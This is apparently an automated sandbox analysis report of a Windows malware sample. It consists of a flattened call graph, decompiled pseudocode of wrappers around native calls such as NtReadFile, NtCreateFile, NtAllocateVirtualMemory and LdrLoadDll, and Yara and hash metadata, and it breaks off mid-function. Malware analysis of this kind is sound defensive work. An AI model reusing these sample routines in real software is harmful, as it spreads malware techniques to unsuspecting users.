27075->26993 27077 4145ba 27078 41bdc0 2 API calls 27077->27078 27079 4145c3 27078->27079 27079->26993 27080->26966 27081->26988 27083 414d14 27082->27083 27084 41af60 LdrLoadDll 27082->27084 27085 41a320 LdrLoadDll 27083->27085 27084->27083 27085->26990 27087 41a4ac NtClose 27086->27087 27088 41af60 LdrLoadDll 27086->27088 27087->26995 27088->27087 27089->26974 27090->27037 27093 41bfa8 27091->27093 27104 41a630 27091->27104 27093->27065 27095 41a42c NtReadFile 27094->27095 27096 41af60 LdrLoadDll 27094->27096 27095->27066 27096->27095 27098 41bbb4 27097->27098 27099 41bb9d 27097->27099 27098->27077 27099->27098 27100 41bf90 2 API calls 27099->27100 27101 41bbcb 27100->27101 27101->27077 27102->27067 27103->27054 27105 41af60 LdrLoadDll 27104->27105 27106 41a64c RtlAllocateHeap 27105->27106 27106->27093 27235 41a540 27107->27235 27109 41bd6d 27109->27000 27111 414081 27110->27111 27112 414089 27110->27112 27111->27003 27113 41435c 27112->27113 27238 41cf30 27112->27238 27113->27003 27115 4140dd 27116 41cf30 2 API calls 27115->27116 27119 4140e8 27116->27119 27117 414136 27120 41cf30 2 API calls 27117->27120 27119->27117 27121 41d060 3 API calls 27119->27121 27249 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 27119->27249 27123 41414a 27120->27123 27121->27119 27122 4141a7 27124 41cf30 2 API calls 27122->27124 27123->27122 27243 41d060 27123->27243 27126 4141bd 27124->27126 27127 4141fa 27126->27127 27130 41d060 3 API calls 27126->27130 27128 41cf30 2 API calls 27127->27128 27129 414205 27128->27129 27131 41d060 3 API calls 27129->27131 27138 41423f 27129->27138 27130->27126 27131->27129 27133 414334 27251 41cf90 LdrLoadDll RtlFreeHeap 27133->27251 27135 41433e 27252 41cf90 LdrLoadDll RtlFreeHeap 27135->27252 27137 414348 27253 41cf90 LdrLoadDll RtlFreeHeap 27137->27253 27250 41cf90 LdrLoadDll RtlFreeHeap 27138->27250 27140 414352 27254 41cf90 LdrLoadDll RtlFreeHeap 27140->27254 27143 4153a1 27142->27143 27144 414a50 6 API calls 27143->27144 27146 4153b7 27144->27146 27145 41540a 27145->27007 27146->27145 27147 4153f2 27146->27147 27148 415405 27146->27148 27150 41bdc0 2 API calls 27147->27150 27149 41bdc0 2 API calls 27148->27149 27149->27145 27151 4153f7 27150->27151 27151->27007 27153 41ad84 27152->27153 27154 41ac30 LdrLoadDll 27152->27154 27255 41ac30 27153->27255 27154->27153 27156 41ad8d 27157 41ac30 LdrLoadDll 27156->27157 27158 41ad96 27157->27158 27159 41ac30 LdrLoadDll 27158->27159 27160 41ad9f 27159->27160 27161 41ac30 LdrLoadDll 27160->27161 27162 41ada8 27161->27162 27163 41ac30 LdrLoadDll 27162->27163 27164 41adb1 27163->27164 27165 41ac30 LdrLoadDll 27164->27165 27166 41adbd 27165->27166 27167 41ac30 LdrLoadDll 27166->27167 27168 41adc6 27167->27168 27169 41ac30 LdrLoadDll 27168->27169 27170 41adcf 27169->27170 27171 41ac30 LdrLoadDll 27170->27171 27172 41add8 27171->27172 27173 41ac30 LdrLoadDll 27172->27173 27174 41ade1 27173->27174 27175 41ac30 LdrLoadDll 27174->27175 27176 41adea 27175->27176 27177 41ac30 LdrLoadDll 27176->27177 27178 41adf6 27177->27178 27179 41ac30 LdrLoadDll 27178->27179 27180 41adff 27179->27180 27181 41ac30 LdrLoadDll 27180->27181 27182 41ae08 27181->27182 27183 41ac30 LdrLoadDll 27182->27183 27184 41ae11 27183->27184 27185 41ac30 LdrLoadDll 27184->27185 27186 41ae1a 27185->27186 27187 41ac30 LdrLoadDll 27186->27187 27188 41ae23 27187->27188 27189 41ac30 LdrLoadDll 27188->27189 27190 41ae2f 27189->27190 27191 41ac30 LdrLoadDll 27190->27191 27192 41ae38 27191->27192 27193 41ac30 LdrLoadDll 27192->27193 27194 41ae41 27193->27194 27195 41ac30 LdrLoadDll 27194->27195 27196 41ae4a 27195->27196 27197 41ac30 LdrLoadDll 27196->27197 27198 41ae53 27197->27198 27199 41ac30 LdrLoadDll 27198->27199 27200 41ae5c 27199->27200 27201 41ac30 LdrLoadDll 27200->27201 27202 41ae68 27201->27202 27203 41ac30 LdrLoadDll 27202->27203 27204 41ae71 27203->27204 27205 41ac30 LdrLoadDll 27204->27205 27206 41ae7a 27205->27206 27207 41ac30 LdrLoadDll 27206->27207 27208 41ae83 27207->27208 27209 41ac30 LdrLoadDll 27208->27209 27210 41ae8c 27209->27210 27211 41ac30 LdrLoadDll 27210->27211 27212 41ae95 27211->27212 27213 41ac30 LdrLoadDll 27212->27213 27214 41aea1 27213->27214 27215 41ac30 LdrLoadDll 27214->27215 27216 41aeaa 27215->27216 27217 41ac30 LdrLoadDll 27216->27217 27218 41aeb3 27217->27218 27219 41ac30 LdrLoadDll 27218->27219 27220 41aebc 27219->27220 27221 41ac30 LdrLoadDll 27220->27221 27222 41aec5 27221->27222 27223 41ac30 LdrLoadDll 27222->27223 27224 41aece 27223->27224 27225 41ac30 LdrLoadDll 27224->27225 27226 41aeda 27225->27226 27227 41ac30 LdrLoadDll 27226->27227 27228 41aee3 27227->27228 27229 41ac30 LdrLoadDll 27228->27229 27230 41aeec 27229->27230 27230->27011 27232 41af60 LdrLoadDll 27231->27232 27233 419edc 27232->27233 27233->26931 27234->27008 27236 41af60 LdrLoadDll 27235->27236 27237 41a55c NtAllocateVirtualMemory 27236->27237 27237->27109 27239 41cf40 27238->27239 27240 41cf46 27238->27240 27239->27115 27241 41bf90 2 API calls 27240->27241 27242 41cf6c 27241->27242 27242->27115 27244 41cfd0 27243->27244 27245 41d02d 27244->27245 27246 41bf90 2 API calls 27244->27246 27245->27123 27247 41d00a 27246->27247 27248 41bdc0 2 API calls 27247->27248 27248->27245 27249->27119 27250->27133 27251->27135 27252->27137 27253->27140 27254->27113 27256 41ac4b 27255->27256 27257 414e50 LdrLoadDll 27256->27257 27258 41ac6b 27257->27258 27259 414e50 LdrLoadDll 27258->27259 27260 41ad17 27258->27260 27259->27260 27260->27156 27260->27260 27262 41a68c RtlFreeHeap 27261->27262 27263 41af60 LdrLoadDll 27261->27263 27262->27019 27263->27262 27265 407eb0 27264->27265 27266 407eab 27264->27266 27267 41bd40 2 API calls 27265->27267 27266->26939 27270 407ed5 27267->27270 27268 407f38 27268->26939 27269 419ec0 LdrLoadDll 27269->27270 27270->27268 27270->27269 27271 407f3e 27270->27271 27276 41bd40 2 API calls 27270->27276 27280 41a5c0 27270->27280 27272 407f64 27271->27272 27274 41a5c0 LdrLoadDll 27271->27274 27272->26939 27275 407f55 27274->27275 27275->26939 27276->27270 27278 41a5c0 LdrLoadDll 27277->27278 27279 40817e 27278->27279 27279->26900 27281 41af60 LdrLoadDll 27280->27281 27282 41a5dc 27281->27282 27282->27270 27284 41b5c3 27283->27284 27287 40acf0 27284->27287 27288 40ad14 27287->27288 27289 40ad50 LdrLoadDll 27288->27289 27290 409c4a 27288->27290 27289->27290 27290->26906 27292 40b063 27291->27292 27294 40b0e0 27292->27294 27304 419c90 LdrLoadDll 27292->27304 27294->26913 27296 41af60 LdrLoadDll 27295->27296 27297 40f1bb 27296->27297 27297->26920 27298 41a7d0 27297->27298 27299 41af60 LdrLoadDll 27298->27299 27300 41a7ef LookupPrivilegeValueW 27299->27300 27300->26917 27302 41af60 LdrLoadDll 27301->27302 27303 41a27c 27301->27303 27302->27303 27303->26921 27304->27294 27306 40b1c9 27305->27306 27307 40b040 LdrLoadDll 27306->27307 27308 40b204 27307->27308 27308->26855 27310 40ae51 27309->27310 27311 40ae4d 27309->27311 27312 40ae9c 27310->27312 27313 40ae6a 27310->27313 27311->26857 27348 419cd0 LdrLoadDll 27312->27348 27347 419cd0 LdrLoadDll 27313->27347 27315 40aead 27315->26857 27317 40ae8c 27317->26857 27319 40f4a0 LdrLoadDll 27318->27319 27320 4143c6 27318->27320 27319->27320 27320->26859 27349 4087a0 27321->27349 27324 4087a0 8 API calls 27325 408a8a 27324->27325 27327 408a9d 27325->27327 27367 40f710 6 API calls 27325->27367 27327->26861 27329 41af60 LdrLoadDll 27328->27329 27330 40c322 27329->27330 27331 40f4a0 27330->27331 27332 40f4bd 27331->27332 27477 419fc0 27332->27477 27335 40f505 27335->26865 27336 41a010 LdrLoadDll 27337 40f52e 27336->27337 27337->26865 27339 40c385 27338->27339 27340 41af60 LdrLoadDll 27338->27340 27339->26871 27339->26874 27340->27339 27342 41af60 LdrLoadDll 27341->27342 27343 40c459 27342->27343 27343->26882 27345 41af60 LdrLoadDll 27344->27345 27346 40c4ac 27345->27346 27346->26886 27347->27317 27348->27315 27350 407ea0 2 API calls 27349->27350 27364 4087ba 27350->27364 27351 408a49 27351->27324 27351->27327 27352 408a3f 27353 408160 LdrLoadDll 27352->27353 27353->27351 27356 419f00 LdrLoadDll 27356->27364 27360 40c4c0 LdrLoadDll NtClose 27360->27364 27363 419e20 LdrLoadDll 27363->27364 27364->27351 27364->27352 27364->27356 27364->27360 27364->27363 27365 41a490 LdrLoadDll NtClose 27364->27365 27368 419d10 27364->27368 27371 4085d0 27364->27371 27383 40f5f0 LdrLoadDll NtClose 27364->27383 27384 419d90 LdrLoadDll 27364->27384 27385 419dc0 LdrLoadDll 27364->27385 27386 419e50 LdrLoadDll 27364->27386 27387 4083a0 27364->27387 27403 405f60 LdrLoadDll 27364->27403 27365->27364 27367->27327 27369 419d2c 27368->27369 27370 41af60 LdrLoadDll 27368->27370 27369->27364 27370->27369 27372 4085e6 27371->27372 27404 419880 27372->27404 27374 4085ff 27379 408771 27374->27379 27425 4081a0 27374->27425 27376 4086e5 27377 4083a0 7 API calls 27376->27377 27376->27379 27378 408713 27377->27378 27378->27379 27380 419f00 LdrLoadDll 27378->27380 27379->27364 27381 408748 27380->27381 27381->27379 27382 41a500 LdrLoadDll 27381->27382 27382->27379 27383->27364 27384->27364 27385->27364 27386->27364 27388 4083c9 27387->27388 27459 408310 27388->27459 27391 41a500 LdrLoadDll 27392 4083dc 27391->27392 27392->27391 27393 408467 27392->27393 27396 408462 27392->27396 27467 40f670 27392->27467 27393->27364 27394 41a490 2 API calls 27395 40849a 27394->27395 27395->27393 27397 419d10 LdrLoadDll 27395->27397 27396->27394 27398 4084ff 27397->27398 27398->27393 27471 419d50 27398->27471 27400 408563 27400->27393 27401 414a50 6 API calls 27400->27401 27402 4085b8 27401->27402 27402->27364 27403->27364 27405 41bf90 2 API calls 27404->27405 27406 419897 27405->27406 27432 409310 27406->27432 27408 4198b2 27409 4198f0 27408->27409 27410 4198d9 27408->27410 27412 41bd40 2 API calls 27409->27412 27411 41bdc0 2 API calls 27410->27411 27413 4198e6 27411->27413 27414 41992a 27412->27414 27413->27374 27415 41bd40 2 API calls 27414->27415 27416 419943 27415->27416 27422 419be4 27416->27422 27438 41bd80 27416->27438 27419 419bd0 27420 41bdc0 2 API calls 27419->27420 27421 419bda 27420->27421 27421->27374 27423 41bdc0 2 API calls 27422->27423 27424 419c39 27423->27424 27424->27374 27426 40829f 27425->27426 27427 4081b5 27425->27427 27426->27376 27427->27426 27428 414a50 6 API calls 27427->27428 27429 408222 27428->27429 27430 41bdc0 2 API calls 27429->27430 27431 408249 27429->27431 27430->27431 27431->27376 27433 409335 27432->27433 27434 40acf0 LdrLoadDll 27433->27434 27435 409368 27434->27435 27437 40938d 27435->27437 27441 40cf20 27435->27441 27437->27408 27456 41a580 27438->27456 27442 40cf4c 27441->27442 27443 41a1e0 LdrLoadDll 27442->27443 27444 40cf65 27443->27444 27445 40cf6c 27444->27445 27452 41a220 27444->27452 27445->27437 27449 40cfa7 27450 41a490 2 API calls 27449->27450 27451 40cfca 27450->27451 27451->27437 27453 41af60 LdrLoadDll 27452->27453 27454 40cf8f 27453->27454 27454->27445 27455 41a810 LdrLoadDll 27454->27455 27455->27449 27457 41af60 LdrLoadDll 27456->27457 27458 419bc9 27457->27458 27458->27419 27458->27422 27460 408328 27459->27460 27461 408343 27460->27461 27462 40acf0 LdrLoadDll 27460->27462 27463 414e50 LdrLoadDll 27461->27463 27462->27461 27464 408353 27463->27464 27465 40835c PostThreadMessageW 27464->27465 27466 408370 27464->27466 27465->27466 27466->27392 27468 40f683 27467->27468 27474 419e90 27468->27474 27472 419d6c 27471->27472 27473 41af60 LdrLoadDll 27471->27473 27472->27400 27473->27472 27475 40f6ae 27474->27475 27476 41af60 LdrLoadDll 27474->27476 27475->27392 27476->27475 27478 41af60 LdrLoadDll 27477->27478 27479 40f4fe 27478->27479 27479->27335 27479->27336

                          Executed Functions

                          Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                          C-Code - Quality: 37%
                          			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                          0x0041a413
                          0x0041a41f
                          0x0041a427
                          0x0041a42c
                          0x0041a432
                          0x0041a44d
                          0x0041a455
                          0x0041a459

                          APIs
                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1JA$rMA$rMA
                          • API String ID: 2738559852-782607585
                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3 41a40a-41a459 call 41af60 NtReadFile
                          C-Code - Quality: 25%
                          			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				signed int _t33;

				asm("gs lodsd");
				_t33 =  *(__eax - 0x74aab6f9) * 0x8458bec;
				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x414a31
				_t7 =  &_a32; // 0x414d72
				_t13 =  &_a8; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, _t30, _t33); // executed
				return _t20;
			}








                          0x0041a40a
                          0x0041a40c
                          0x0041a413
                          0x0041a41f
                          0x0041a427
                          0x0041a42c
                          0x0041a432
                          0x0041a44d
                          0x0041a455
                          0x0041a459

                          APIs
                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1JA$rMA$rMA
                          • API String ID: 2738559852-782607585
                          • Opcode ID: c0e45899e5ff38351a7657155f39c2eb5ba961495a8cb2fd0629dc440d75992a
                          • Instruction ID: 19ff9683b3dc3af87ec081a3c22ea504c3d46a9b2486d5d163cbd951532a006a
                          • Opcode Fuzzy Hash: c0e45899e5ff38351a7657155f39c2eb5ba961495a8cb2fd0629dc440d75992a
                          • Instruction Fuzzy Hash: C9F01DB2200108AFCB04DF89CC45EEB77ADEF8C314F158249BA1D97251C630E811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 253 40acf0-40ad19 call 41cc50 256 40ad1b-40ad1e 253->256 257 40ad1f-40ad2d call 41d070 253->257 260 40ad3d-40ad4e call 41b4a0 257->260 261 40ad2f-40ad3a call 41d2f0 257->261 266 40ad50-40ad64 LdrLoadDll 260->266 267 40ad67-40ad6a 260->267 261->260 266->267
                          C-Code - Quality: 100%
                          			E0040ACF0(void* __ebx, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* __ebp;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_t25 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(_v8, _t25, __eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0(__ebx, __esi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}














                          0x0040acf9
                          0x0040ad0c
                          0x0040ad0f
                          0x0040ad14
                          0x0040ad19
                          0x0040ad23
                          0x0040ad28
                          0x0040ad2b
                          0x0040ad2d
                          0x0040ad35
                          0x0040ad3a
                          0x0040ad3a
                          0x0040ad41
                          0x0040ad49
                          0x0040ad4c
                          0x0040ad4e
                          0x0040ad62
                          0x00000000
                          0x0040ad64
                          0x0040ad6a
                          0x0040ad1e
                          0x0040ad1e
                          0x0040ad1e

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 268 41a35a-41a3b1 call 41af60 NtCreateFile
                          C-Code - Quality: 79%
                          			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				asm("adc al, 0x55");
				_t18 = _a4;
				_t5 = _t18 + 0xc40; // 0xc40
				E0041AF60(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}





                          0x0041a35f
                          0x0041a363
                          0x0041a36f
                          0x0041a377
                          0x0041a3ad
                          0x0041a3b1

                          APIs
                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 8c2af1f04da9e255862acc5baa835ad1e984248b24d21e88d49fdc6d88897418
                          • Instruction ID: 2050b9fffedb920e41d1b2f8bdea77bdb674f9820160c087a2ea780052f335c0
                          • Opcode Fuzzy Hash: 8c2af1f04da9e255862acc5baa835ad1e984248b24d21e88d49fdc6d88897418
                          • Instruction Fuzzy Hash: A701BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248FA1D97251D630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 271 41a360-41a376 272 41a37c-41a3b1 NtCreateFile 271->272 273 41a377 call 41af60 271->273 273->272
                          C-Code - Quality: 100%
                          			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                          0x0041a36f
                          0x0041a377
                          0x0041a3ad
                          0x0041a3b1

                          APIs
                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 274 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                          C-Code - Quality: 100%
                          			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                          0x0041a54f
                          0x0041a557
                          0x0041a579
                          0x0041a57d

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A48C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0041A48C(void* __ebx, void* __edx) {
				long _t8;
				void* _t14;

				_t5 =  *0xFFFFFFFFEC8B550F;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t14,  *0xFFFFFFFFEC8B550F, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *0xFFFFFFFFEC8B5513); // executed
				return _t8;
			}





                          0x0041a493
                          0x0041a496
                          0x0041a49f
                          0x0041a4a7
                          0x0041a4b5
                          0x0041a4b9

                          APIs
                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 141fcef12e090d403854eb609201cb7a049701603f3fb63610599b09421aeb32
                          • Instruction ID: 25d9a5892bfc2e4703fad434ceea688b8674cbeee0cd7d47af1bee99dba1b6f7
                          • Opcode Fuzzy Hash: 141fcef12e090d403854eb609201cb7a049701603f3fb63610599b09421aeb32
                          • Instruction Fuzzy Hash: BBE08C75200110ABD710DB94CC85F973729EF48324F188489FA085B241C130E510CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                          0x0041a493
                          0x0041a496
                          0x0041a49f
                          0x0041a4a7
                          0x0041a4b5
                          0x0041a4b9

                          APIs
                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E00409AB0(intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t52 = _a4;
				_t39 = 0; // executed
